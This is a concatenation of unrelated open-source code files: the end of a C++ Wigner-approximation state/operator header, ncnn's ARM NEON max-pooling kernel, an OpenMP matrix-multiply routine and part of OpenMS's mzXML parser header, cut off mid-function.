X(i) = 1;
P(i + dimension / 2) = 1;
this->positional_indices(i) =
math::space::indices_to_index(X, this->expectation_table);
this->momentum_indices(i) =
math::space::indices_to_index(P, this->expectation_table);
}
// expectations check in
for (arma::uword i = 0; i < length; i++) {
const lvec indices =
arma::conv_to<lvec>::from(
math::space::index_to_indices(i, this->expectation_table));
this->expectations(i) =
details::expectation(math::polynomial::Term(1.0, indices),
this->points, this->weights, this->scaling);
}
}
inline
State(const arma::mat & points,
const arma::vec & weights,
const arma::vec & masses,
const arma::uvec & expectation_table,
const arma::vec & expectations,
const arma::uvec & positional_indices,
const arma::uvec & momentum_indices,
const arma::vec & scaling,
const arma::uword grade) :
points(points),
weights(weights),
masses(masses),
grade(grade),
expectation_table(expectation_table),
expectations(expectations),
positional_indices(positional_indices),
momentum_indices(momentum_indices),
scaling(scaling) {}
inline
State(const State & state) :
points(state.points),
weights(state.weights),
masses(state.masses),
grade(state.grade),
expectation_table(state.expectation_table),
expectations(state.expectations),
positional_indices(state.positional_indices),
momentum_indices(state.momentum_indices),
scaling(state.scaling) {}
inline
arma::uword dim() const {
return points.n_rows / 2;
}
inline
State normalise() const {
State state = *this;
state.weights = state.weights / arma::sum(state.weights);
return state;
}
inline
arma::vec positional_expectation() const {
const arma::vec result = this->expectations(this->positional_indices);
const arma::vec scale = this->scaling.rows(0, this->dim() - 1);
return result * scale;
}
inline
arma::vec momentum_expectation() const {
const arma::vec result = this->expectations(this->momentum_indices);
const arma::vec scale = this->scaling.rows(this->dim(),
2 * this->dim() - 1);
return result * scale;
}
State operator+(const State & B) const {
if (!arma::approx_equal(this->weights, B.weights, "abs_diff", 1e-16) ||
!arma::approx_equal(this->masses, B.masses, "abs_diff", 1e-16)) {
throw Error("Different cwa states are being added");
}
State state = B;
state.points += this->points;
state.expectations += this->expectations;
return state;
}
State operator*(const double B) const {
State state = *this;
state.expectations *= B;
state.points *= B;
return state;
}
template<typename T>
auto expectation(const math::Polynomial <T> & polynomial) const {
return details::at_search(polynomial,
this->points,
this->weights,
this->expectations,
this->expectation_table,
this->scaling,
this->grade) * polynomial.at(this->scaling);
}
template<typename T>
arma::vec expectation(const std::vector<math::Polynomial < T>>
& polynomials) const {
arma::vec result(polynomials.size());
#pragma omp parallel for
for (arma::uword i = 0; i < result.n_elem; i++) {
result(i) = this->expectation(polynomials[i]);
}
return result;
}
State & operator=(const State &) = default;
};
struct Operator {
public:
math::Polynomial<double> potential;
math::Polynomial<double> H;
std::vector<math::Polynomial < double>> operators;
Operator(const State & state,
const math::Polynomial<double> & potential) :
potential(potential),
H(hamiltonian(potential, state.masses).scale(state.scaling)),
operators() {
std::vector<math::Polynomial<double>>
op(std::pow(state.grade, state.dim() * 2));
op[0] = math::Polynomial<double>(state.dim() * 2);
for (arma::uword i = 1; i < op.size(); i++) {
const auto observable =
math::Polynomial(math::polynomial::Term<double>(1.0,
math::space::index_to_indices(
i,
state.expectation_table)));
const arma::uword cut_off = std::min(observable.grade(), H.grade()) / 2;
const auto moyal =
moyal_bracket(math::Polynomial(observable), H, state.scaling,
cut_off);
op[i] = moyal;
}
this->operators = op;
}
inline
PropagationType propagation_type() const {
return Classic;
}
State operator()(const State & state) const {
arma::mat p_submatrix = state.points.rows(state.dim(), 2 * state.dim() - 1);
p_submatrix.each_col() /= state.masses;
const arma::mat points_change_list =
arma::join_cols(p_submatrix,
cwa::details::force(this->potential,
state.points.rows(0, state.dim() -
1)));
arma::vec expectation_change_list =
arma::vec(arma::size(state.expectations));
#pragma omp parallel for
for (arma::uword i = 0; i < expectation_change_list.n_elem; i++) {
expectation_change_list(i) =
details::at_search(this->operators[i],
state.points,
state.weights,
state.expectations,
state.expectation_table,
state.scaling,
state.grade);
}
return State(points_change_list,
state.weights,
state.masses,
state.expectation_table,
expectation_change_list,
state.positional_indices,
state.momentum_indices,
state.scaling,
state.grade);
}
Operator & operator=(const Operator &) = default;
};
} // namespace cwa
}
#endif //METHODS_CWA_SMD_H
|
pooling_2x2.h | // Tencent is pleased to support the open source community by making ncnn available.
//
// Copyright (C) 2017 THL A29 Limited, a Tencent company. All rights reserved.
//
// Licensed under the BSD 3-Clause License (the "License"); you may not use this file except
// in compliance with the License. You may obtain a copy of the License at
//
// https://opensource.org/licenses/BSD-3-Clause
//
// Unless required by applicable law or agreed to in writing, software distributed
// under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
// CONDITIONS OF ANY KIND, either express or implied. See the License for the
// specific language governing permissions and limitations under the License.
#if __ARM_NEON
#include <arm_neon.h>
#endif // __ARM_NEON
static void pooling2x2s2_max_neon(const Mat& bottom_blob, Mat& top_blob)
{
int w = bottom_blob.w;
int inch = bottom_blob.c;
int outw = top_blob.w;
int outh = top_blob.h;
const int tailstep = w - 2*outw + w;
#pragma omp parallel for
for (int q=0; q<inch; q++)
{
const float* img0 = bottom_blob.channel(q);
float* outptr = top_blob.channel(q);
const float* r0 = img0;
const float* r1 = img0 + w;
for (int i = 0; i < outh; i++)
{
#if __ARM_NEON
int nn = outw >> 2;
int remain = outw - (nn << 2);
#else
int remain = outw;
#endif // __ARM_NEON
#if __ARM_NEON
#if __aarch64__
if (nn > 0)
{
asm volatile(
"0: \n"
"prfm pldl1keep, [%1, #256] \n"
"prfm pldl1keep, [%2, #256] \n"
"ld1 {v0.4s, v1.4s}, [%1], #32 \n"
"ld1 {v2.4s, v3.4s}, [%2], #32 \n"
"fmax v0.4s, v0.4s, v2.4s \n"
"fmax v1.4s, v1.4s, v3.4s \n"
"fmaxp v2.4s, v0.4s, v1.4s \n"
"subs %w0, %w0, #1 \n"
"st1 {v2.4s}, [%3], #16 \n"
"bne 0b \n"
: "=r"(nn), // %0
"=r"(r0), // %1
"=r"(r1), // %2
"=r"(outptr) // %3
: "0"(nn),
"1"(r0),
"2"(r1),
"3"(outptr)
: "cc", "memory", "v0", "v1", "v2", "v3"
);
}
#else
if (nn > 0)
{
asm volatile(
"0: \n"
"pld [%1, #256] \n"
"pld [%2, #256] \n"
"vld1.f32 {d0-d3}, [%1]! \n"
"vld1.f32 {d4-d7}, [%2]! \n"
"vmax.f32 q0, q0, q2 \n"
"vmax.f32 q1, q1, q3 \n"
"vpmax.f32 d4, d0, d1 \n"
"vpmax.f32 d5, d2, d3 \n"
"subs %0, #1 \n"
"vst1.f32 {d4-d5}, [%3]! \n"
"bne 0b \n"
: "=r"(nn), // %0
"=r"(r0), // %1
"=r"(r1), // %2
"=r"(outptr) // %3
: "0"(nn),
"1"(r0),
"2"(r1),
"3"(outptr)
: "cc", "memory", "q0", "q1", "q2", "q3"
);
}
#endif // __aarch64__
#endif // __ARM_NEON
for (; remain>0; remain--)
{
float max0 = std::max(r0[0], r0[1]);
float max1 = std::max(r1[0], r1[1]);
*outptr = std::max(max0, max1);
r0 += 2;
r1 += 2;
outptr++;
}
r0 += tailstep;
r1 += tailstep;
}
}
}
|
mat_mul_p4a_7000.c | /*
* file for mat_mul.c
*/
#include "./mat_mul.h"
#include "./size.h"
void mat_mul(int *a, int *b, int *c);
void mat_mul(int *a, int *b, int *c)
{
int i, j, k, t;
#pragma omp parallel for private(j, t, k)
for(i = 0; i <= 6999; i += 1)
for(j = 0; j <= 6999; j += 1) {
c[i*7000+j] = 0;
for(k = 0; k <= 6999; k += 1)
for(t = 0; t <= 99; t += 1)
c[i*7000+j] += a[i*7000+k]*b[j*7000+k];
}
return;
}
|
MzXMLHandler.h | // --------------------------------------------------------------------------
// OpenMS -- Open-Source Mass Spectrometry
// --------------------------------------------------------------------------
// Copyright The OpenMS Team -- Eberhard Karls University Tuebingen,
// ETH Zurich, and Freie Universitaet Berlin 2002-2015.
//
// This software is released under a three-clause BSD license:
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above copyright
// notice, this list of conditions and the following disclaimer in the
// documentation and/or other materials provided with the distribution.
// * Neither the name of any author or any participating institution
// may be used to endorse or promote products derived from this software
// without specific prior written permission.
// For a full list of authors, refer to the file AUTHORS.
// --------------------------------------------------------------------------
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
// AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
// IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
// ARE DISCLAIMED. IN NO EVENT SHALL ANY OF THE AUTHORS OR THE CONTRIBUTING
// INSTITUTIONS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
// EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
// PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
// OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
// WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
// ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
//
// --------------------------------------------------------------------------
// $Maintainer: Andreas Bertsch $
// $Authors: Marc Sturm $
// --------------------------------------------------------------------------
#ifndef OPENMS_FORMAT_HANDLERS_MZXMLHANDLER_H
#define OPENMS_FORMAT_HANDLERS_MZXMLHANDLER_H
#include <OpenMS/CONCEPT/ProgressLogger.h>
#include <OpenMS/FORMAT/Base64.h>
#include <OpenMS/FORMAT/OPTIONS/PeakFileOptions.h>
#include <OpenMS/FORMAT/HANDLERS/XMLHandler.h>
#include <OpenMS/DATASTRUCTURES/String.h>
#include <OpenMS/KERNEL/MSExperiment.h>
#include <OpenMS/INTERFACES/IMSDataConsumer.h>
#include <stack>
namespace OpenMS
{
class MetaInfoInterface;
namespace Internal
{
/**
@brief XML handlers for MzXMLFile
MapType has to be a MSExperiment or have the same interface.
Do not use this class. It is only needed in MzXMLFile.
*/
template <typename MapType>
class MzXMLHandler :
public XMLHandler
{
public:
/**@name Constructors and destructor */
//@{
/// Constructor for a read-only handler
MzXMLHandler(MapType& exp, const String& filename, const String& version, ProgressLogger& logger) :
XMLHandler(filename, version),
exp_(&exp),
cexp_(0),
decoder_(),
nesting_level_(0),
skip_spectrum_(false),
spec_write_counter_(1),
consumer_(NULL),
scan_count_(0),
logger_(logger)
{
init_();
}
/// Constructor for a write-only handler
MzXMLHandler(const MapType& exp, const String& filename, const String& version, const ProgressLogger& logger) :
XMLHandler(filename, version),
exp_(0),
cexp_(&exp),
decoder_(),
nesting_level_(0),
skip_spectrum_(false),
spec_write_counter_(1),
consumer_(NULL),
scan_count_(0),
logger_(logger)
{
init_();
}
/// Destructor
virtual ~MzXMLHandler() {}
//@}
// Docu in base class
virtual void endElement(const XMLCh* const uri, const XMLCh* const local_name, const XMLCh* const qname);
// Docu in base class
virtual void startElement(const XMLCh* const uri, const XMLCh* const local_name, const XMLCh* const qname, const xercesc::Attributes& attributes);
// Docu in base class
virtual void characters(const XMLCh* const chars, const XMLSize_t length);
/// Write the contents to a stream
void writeTo(std::ostream& os);
/// Sets the options
void setOptions(const PeakFileOptions& options)
{
options_ = options;
}
///Gets the scan count
UInt getScanCount()
{
return scan_count_;
}
/// Set the IMSDataConsumer consumer which will consume the read data
void setMSDataConsumer(Interfaces::IMSDataConsumer<MapType> * consumer)
{
consumer_ = consumer;
}
private:
/// initialize members (call from C'tor)
void init_()
{
cv_terms_.resize(6);
//Polarity
String("any;+;-").split(';', cv_terms_[0]);
//Scan type
// is no longer used cv_terms_[1] is empty now
//Ionization method
String(";ESI;EI;CI;FAB;;;;;;;;;;;;;APCI;;;;;;;;MALDI").split(';', cv_terms_[2]);
cv_terms_[2].resize(IonSource::SIZE_OF_IONIZATIONMETHOD);
//Mass analyzer
String(";Quadrupole;Quadrupole Ion Trap;;;TOF;Magnetic Sector;FT-ICR;").split(';', cv_terms_[3]);
cv_terms_[3].resize(MassAnalyzer::SIZE_OF_ANALYZERTYPE);
//Detector
String(";EMT;;;Faraday Cup;;;;;Channeltron;Daly;Microchannel plate").split(';', cv_terms_[4]);
cv_terms_[4].resize(IonDetector::SIZE_OF_TYPE);
//Resolution method
String(";FWHM;TenPercentValley;Baseline").split(';', cv_terms_[5]);
cv_terms_[5].resize(MassAnalyzer::SIZE_OF_RESOLUTIONMETHOD);
/* // OLD:
cv_terms_.resize(6);
//Polarity
String("any;+;-").split(';',cv_terms_[0]);
//Scan type
// is no longer used cv_terms_[1] is empty now
//Ionization method
String(";ESI;EI;CI;FAB;TSP;MALDI;FD;FI;PD;SI;TI;API;ISI;CID;CAD;HN;APCI;APPI;ICP").split(';',cv_terms_[2]);
//Mass analyzer
String(";Quadrupole;Quadrupole Ion Trap;;;TOF;Magnetic Sector;FT-ICR;").split(';',cv_terms_[3]);
//Detector
String(";EMT;Daly;;Faraday Cup;;;;Channeltron").split(';',cv_terms_[4]);
//Resolution method
String(";FWHM;TenPercentValley;Baseline").split(';',cv_terms_[5]);
*/
}
protected:
/// Peak type
typedef typename MapType::PeakType PeakType;
/// Spectrum type
typedef MSSpectrum<PeakType> SpectrumType;
/// map pointer for reading
MapType* exp_;
/// map pointer for writing
const MapType* cexp_;
/// Options for loading and storing
PeakFileOptions options_;
/**@name temporary data structures to hold parsed data */
//@{
Base64 decoder_;
Int nesting_level_;
/**
@brief Data necessary to generate a single spectrum
Small struct holds all data necessary to populate a spectrum at a
later timepoint (since reading of the base64 data and generation of
spectra can be done at distinct timepoints).
*/
struct SpectrumData
{
UInt peak_count_;
String precision_;
String compressionType_;
String char_rest_;
SpectrumType spectrum;
bool skip_data;
};
/// Vector of spectrum data stored for later parallel processing
std::vector< SpectrumData > spectrum_data_;
//@}
/// Flag that indicates whether this spectrum should be skipped (due to options)
bool skip_spectrum_;
/// spectrum counter (spectra without peaks are not written)
UInt spec_write_counter_;
/// Consumer class to work on spectra
Interfaces::IMSDataConsumer<MapType>* consumer_;
/// Consumer class to work on spectra
UInt scan_count_;
/// Progress logging class
const ProgressLogger& logger_;
/// write metaInfo to xml (usually in nameValue-tag)
inline void writeUserParam_(std::ostream& os, const MetaInfoInterface& meta, int indent = 4, String tag = "nameValue")
{
std::vector<String> keys; // Vector to hold keys to meta info
meta.getKeys(keys);
for (std::vector<String>::const_iterator it = keys.begin(); it != keys.end(); ++it)
{
if ((*it)[0] != '#') // internally used meta info start with '#'
{
os << String(indent, '\t') << "<" << tag << " name=\"" << *it << "\" value=\"" << writeXMLEscape(meta.getMetaValue(*it)) << "\"/>\n";
}
}
}
/// data processing auxiliary variable
std::vector< boost::shared_ptr< DataProcessing> > data_processing_;
/**
@brief Fill a single spectrum with data from input
@note Do not modify any internal state variables of the class since
this function will be executed in parallel.
*/
void doPopulateSpectraWithData_(SpectrumData & spectrum_data)
{
typedef typename SpectrumType::PeakType PeakType;
//std::cout << "reading scan" << "\n";
if (spectrum_data.char_rest_ == "") // no peaks
{
return;
}
//remove whitespaces from binary data
//this should not be necessary, but linebreaks inside the base64 data are unfortunately no exception
spectrum_data.char_rest_.removeWhitespaces();
if (spectrum_data.precision_ == "64")
{
std::vector<double> data;
if (spectrum_data.compressionType_ == "zlib")
{
decoder_.decode(spectrum_data.char_rest_, Base64::BYTEORDER_BIGENDIAN, data, true);
}
else
{
decoder_.decode(spectrum_data.char_rest_, Base64::BYTEORDER_BIGENDIAN, data);
}
spectrum_data.char_rest_ = "";
PeakType peak;
//push_back the peaks into the container
for (Size n = 0; n < (2 * spectrum_data.peak_count_); n += 2)
{
// check if peak in in the specified m/z and intensity range
if ((!options_.hasMZRange() || options_.getMZRange().encloses(DPosition<1>(data[n])))
&& (!options_.hasIntensityRange() || options_.getIntensityRange().encloses(DPosition<1>(data[n + 1]))))
{
peak.setMZ(data[n]);
peak.setIntensity(data[n + 1]);
spectrum_data.spectrum.push_back(peak);
}
}
}
else //precision 32
{
std::vector<float> data;
if (spectrum_data.compressionType_ == "zlib")
{
decoder_.decode(spectrum_data.char_rest_, Base64::BYTEORDER_BIGENDIAN, data, true);
}
else
{
decoder_.decode(spectrum_data.char_rest_, Base64::BYTEORDER_BIGENDIAN, data);
}
spectrum_data.char_rest_ = "";
PeakType peak;
//push_back the peaks into the container
for (Size n = 0; n < (2 * spectrum_data.peak_count_); n += 2)
{
if ((!options_.hasMZRange() || options_.getMZRange().encloses(DPosition<1>(data[n])))
&& (!options_.hasIntensityRange() || options_.getIntensityRange().encloses(DPosition<1>(data[n + 1]))))
{
peak.setMZ(data[n]);
peak.setIntensity(data[n + 1]);
spectrum_data.spectrum.push_back(peak);
}
}
}
}
/**
@brief Populate all spectra on the stack with data from input
Will populate all spectra on the current work stack with data (using
multiple threads if available) and append them to the result.
*/
void populateSpectraWithData_()
{
// Whether spectrum should be populated with data
if (options_.getFillData())
{
size_t errCount = 0;
#ifdef _OPENMP
#pragma omp parallel for
#endif
for (SignedSize i = 0; i < (SignedSize)spectrum_data_.size(); i++)
{
// parallel exception catching and re-throwing business
if (!errCount) // no need to parse further if already an error was encountered
{
try
{
doPopulateSpectraWithData_(spectrum_data_[i]);
if (options_.getSortSpectraByMZ() && !spectrum_data_[i].spectrum.isSorted())
{
spectrum_data_[i].spectrum.sortByPosition();
}
}
catch (...)
{
#pragma omp critical(HandleException)
++errCount;
}
}
}
if (errCount != 0)
{
throw Exception::ParseError(__FILE__, __LINE__, __PRETTY_FUNCTION__, file_, "Error during parsing of binary data.");
}
}
// Append all spectra
for (Size i = 0; i < spectrum_data_.size(); i++)
{
if (consumer_ != NULL)
{
consumer_->consumeSpectrum(spectrum_data_[i].spectrum);
if (options_.getAlwaysAppendData())
{
exp_->addSpectrum(spectrum_data_[i].spectrum);
}
}
else
{
exp_->addSpectrum(spectrum_data_[i].spectrum);
}
}
// Delete batch
spectrum_data_.clear();
}
private:
/// Not implemented
MzXMLHandler();
static const XMLCh* s_value_;
static const XMLCh* s_count_;
static const XMLCh* s_type_;
static const XMLCh* s_name_;
static const XMLCh* s_version_;
static const XMLCh* s_filename_;
static const XMLCh* s_filetype_;
static const XMLCh* s_filesha1_;
static const XMLCh* s_completiontime_;
static const XMLCh* s_precision_;
static const XMLCh* s_byteorder_;
static const XMLCh* s_pairorder_;
static const XMLCh* s_compressionType_;
static const XMLCh* s_precursorintensity_;
static const XMLCh* s_precursorcharge_;
static const XMLCh* s_windowwideness_;
static const XMLCh* s_mslevel_;
static const XMLCh* s_peakscount_;
static const XMLCh* s_polarity_;
static const XMLCh* s_scantype_;
static const XMLCh* s_filterline_;
static const XMLCh* s_retentiontime_;
static const XMLCh* s_startmz_;
static const XMLCh* s_endmz_;
static const XMLCh* s_first_;
static const XMLCh* s_last_;
static const XMLCh* s_phone_;
static const XMLCh* s_email_;
static const XMLCh* s_uri_;
static const XMLCh* s_num_;
static const XMLCh* s_intensitycutoff_;
static const XMLCh* s_centroided_;
static const XMLCh* s_deisotoped_;
static const XMLCh* s_chargedeconvoluted_;
// init all the static members, which is necessary because otherwise the undefined order will cause problems
void initStaticMembers_()
{
static bool init(false);
if (!init)
{
s_value_ = xercesc::XMLString::transcode("value");
s_count_ = xercesc::XMLString::transcode("scanCount");
s_type_ = xercesc::XMLString::transcode("type");
s_name_ = xercesc::XMLString::transcode("name");
s_version_ = xercesc::XMLString::transcode("version");
s_filename_ = xercesc::XMLString::transcode("fileName");
s_filetype_ = xercesc::XMLString::transcode("fileType");
s_filesha1_ = xercesc::XMLString::transcode("fileSha1");
s_completiontime_ = xercesc::XMLString::transcode("completionTime");
s_precision_ = xercesc::XMLString::transcode("precision");
s_byteorder_ = xercesc::XMLString::transcode("byteOrder");
s_pairorder_ = xercesc::XMLString::transcode("pairOrder");
s_compressionType_ = xercesc::XMLString::transcode("compressionType");
s_precursorintensity_ = xercesc::XMLString::transcode("precursorIntensity");
s_precursorcharge_ = xercesc::XMLString::transcode("precursorCharge");
s_windowwideness_ = xercesc::XMLString::transcode("windowWideness");
s_mslevel_ = xercesc::XMLString::transcode("msLevel");
s_peakscount_ = xercesc::XMLString::transcode("peaksCount");
s_polarity_ = xercesc::XMLString::transcode("polarity");
s_scantype_ = xercesc::XMLString::transcode("scanType");
s_filterline_ = xercesc::XMLString::transcode("filterLine");
s_retentiontime_ = xercesc::XMLString::transcode("retentionTime");
s_startmz_ = xercesc::XMLString::transcode("startMz");
s_endmz_ = xercesc::XMLString::transcode("endMz");
s_first_ = xercesc::XMLString::transcode("first");
s_last_ = xercesc::XMLString::transcode("last");
s_phone_ = xercesc::XMLString::transcode("phone");
s_email_ = xercesc::XMLString::transcode("email");
s_uri_ = xercesc::XMLString::transcode("URI");
s_num_ = xercesc::XMLString::transcode("num");
s_intensitycutoff_ = xercesc::XMLString::transcode("intensityCutoff");
s_centroided_ = xercesc::XMLString::transcode("centroided");
s_deisotoped_ = xercesc::XMLString::transcode("deisotoped");
s_chargedeconvoluted_ = xercesc::XMLString::transcode("chargeDeconvoluted");
init = true;
}
return;
}
};
//--------------------------------------------------------------------------------
// this cannot be moved into a function as VS2008 does not allow more than 31 static members in a function .. don't ask...
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_value_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_count_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_type_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_name_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_version_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_filename_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_filetype_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_filesha1_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_completiontime_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_precision_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_byteorder_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_pairorder_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_compressionType_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_precursorintensity_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_precursorcharge_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_windowwideness_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_mslevel_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_peakscount_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_polarity_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_scantype_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_filterline_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_retentiontime_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_startmz_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_endmz_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_first_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_last_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_phone_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_email_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_uri_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_num_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_intensitycutoff_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_centroided_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_deisotoped_ = 0;
template <typename MapType>
const XMLCh * MzXMLHandler<MapType>::s_chargedeconvoluted_ = 0;
template <typename MapType>
void MzXMLHandler<MapType>::startElement(const XMLCh* const /*uri*/,
const XMLCh* const /*local_name*/, const XMLCh* const qname,
const xercesc::Attributes& attributes)
{
OPENMS_PRECONDITION(nesting_level_ >= 0, "Nesting level needs to be zero or more")
static bool init_static_members(false);
if (!init_static_members)
{
initStaticMembers_();
}
String tag = sm_.convert(qname);
open_tags_.push_back(tag);
//std::cout << " -- Start -- "<< tag << " -- " << "\n";
//Skip all tags until the the next scan
if (skip_spectrum_ && tag != "scan")
return;
if (tag == "msRun")
{
Int count = 0;
optionalAttributeAsInt_(count, attributes, s_count_);
exp_->reserve(count);
logger_.startProgress(0, count, "loading mzXML file");
scan_count_ = 0;
data_processing_.clear();
//start and end time are xs:duration. This makes no sense => ignore them
}
else if (tag == "parentFile")
{
SourceFile sf;
sf.setNameOfFile(attributeAsString_(attributes, s_filename_));
sf.setFileType(attributeAsString_(attributes, s_filetype_));
sf.setChecksum(attributeAsString_(attributes, s_filesha1_), SourceFile::SHA1);
exp_->getSourceFiles().push_back(sf);
}
else if (tag == "software")
{
String& parent_tag = *(open_tags_.end() - 2);
if (parent_tag == "dataProcessing")
{
data_processing_.back()->getSoftware().setVersion(attributeAsString_(attributes, s_version_));
data_processing_.back()->getSoftware().setName(attributeAsString_(attributes, s_name_));
data_processing_.back()->setMetaValue("#type", String(attributeAsString_(attributes, s_type_)));
String time;
optionalAttributeAsString_(time, attributes, s_completiontime_);
data_processing_.back()->setCompletionTime(asDateTime_(time));
}
else if (parent_tag == "msInstrument")
{
exp_->getInstrument().getSoftware().setVersion(attributeAsString_(attributes, s_version_));
exp_->getInstrument().getSoftware().setName(attributeAsString_(attributes, s_name_));
}
}
else if (tag == "peaks")
{
//precision
spectrum_data_.back().precision_ = "32";
optionalAttributeAsString_(spectrum_data_.back().precision_, attributes, s_precision_);
if (spectrum_data_.back().precision_ != "32" && spectrum_data_.back().precision_ != "64")
{
error(LOAD, String("Invalid precision '") + spectrum_data_.back().precision_ + "' in element 'peaks'");
}
//byte order
String byte_order = "network";
optionalAttributeAsString_(byte_order, attributes, s_byteorder_);
if (byte_order != "network")
{
error(LOAD, String("Invalid or missing byte order '") + byte_order + "' in element 'peaks'. Must be 'network'!");
}
//pair order
String pair_order = "m/z-int";
optionalAttributeAsString_(pair_order, attributes, s_pairorder_);
if (pair_order != "m/z-int")
{
error(LOAD, String("Invalid or missing pair order '") + pair_order + "' in element 'peaks'. Must be 'm/z-int'!");
}
//compressionType
spectrum_data_.back().compressionType_ = "none";
optionalAttributeAsString_(spectrum_data_.back().compressionType_, attributes, s_compressionType_);
if (spectrum_data_.back().compressionType_ != "none" && spectrum_data_.back().compressionType_ != "zlib")
{
error(LOAD, String("Invalid compression type ") + spectrum_data_.back().compressionType_ + "in elements 'peaks'. Must be 'none' or 'zlib'! ");
}
}
else if (tag == "precursorMz")
{
//add new precursor
spectrum_data_.back().spectrum.getPrecursors().push_back(Precursor());
//intensity
try
{
spectrum_data_.back().spectrum.getPrecursors().back().setIntensity(attributeAsDouble_(attributes, s_precursorintensity_));
}
catch (Exception::ParseError& /*e*/)
{
error(LOAD, "Mandatory attribute 'precursorIntensity' of tag 'precursorMz' not found! Setting precursor intensity to zero!");
}
//charge
Int charge = 0;
if (optionalAttributeAsInt_(charge, attributes, s_precursorcharge_))
{
spectrum_data_.back().spectrum.getPrecursors().back().setCharge(charge);
}
//window bounds (here only the width is stored in both fields - this is corrected when we parse the m/z position)
double window = 0.0;
if (optionalAttributeAsDouble_(window, attributes, s_windowwideness_))
{
spectrum_data_.back().spectrum.getPrecursors().back().setIsolationWindowLowerOffset(window);
}
}
else if (tag == "scan")
{
skip_spectrum_ = false;
nesting_level_++;
if (options_.getMetadataOnly())
throw EndParsingSoftly(__FILE__, __LINE__, __PRETTY_FUNCTION__);
// check if the scan is in the desired MS / RT range
UInt ms_level = attributeAsInt_(attributes, s_mslevel_);
if (ms_level == 0)
{
warning(LOAD, String("Invalid 'msLevel' attribute with value '0' in 'scan' element found. Assuming ms level 1!"));
ms_level = 1;
}
//parse retention time and convert it from xs:duration to seconds
double retention_time = 0.0;
String time_string = "";
if (optionalAttributeAsString_(time_string, attributes, s_retentiontime_))
{
time_string = time_string.suffix('T');
//std::cout << "Initial trim: " << time_string << "\n";
if (time_string.has('H'))
{
retention_time += 3600 * asDouble_(time_string.prefix('H'));
time_string = time_string.suffix('H');
//std::cout << "After H: " << time_string << "\n";
}
if (time_string.has('M'))
{
retention_time += 60 * asDouble_(time_string.prefix('M'));
time_string = time_string.suffix('M');
//std::cout << "After M: " << time_string << "\n";
}
if (time_string.has('S'))
{
retention_time += asDouble_(time_string.prefix('S'));
time_string = time_string.suffix('S');
//std::cout << "After S: " << time_string << "\n";
}
}
logger_.setProgress(scan_count_);
if ((options_.hasRTRange() && !options_.getRTRange().encloses(DPosition<1>(retention_time)))
|| (options_.hasMSLevels() && !options_.containsMSLevel(ms_level))
|| options_.getSizeOnly())
{
// skip this tag
skip_spectrum_ = true;
++scan_count_;
return;
}
// Add a new spectrum, initialize and set MS level and RT
spectrum_data_.resize(spectrum_data_.size() + 1); // TODO !!
spectrum_data_.back().peak_count_ = 0;
spectrum_data_.back().spectrum.setMSLevel(ms_level);
spectrum_data_.back().spectrum.setRT(retention_time);
spectrum_data_.back().spectrum.setNativeID(String("scan=") + attributeAsString_(attributes, s_num_));
//peak count == twice the scan size
spectrum_data_.back().peak_count_ = attributeAsInt_(attributes, s_peakscount_);
spectrum_data_.back().spectrum.reserve(spectrum_data_.back().peak_count_ / 2 + 1);
spectrum_data_.back().spectrum.setDataProcessing(data_processing_);
//centroided, chargeDeconvoluted, deisotoped, collisionEnergy are ignored
//other optional attributes
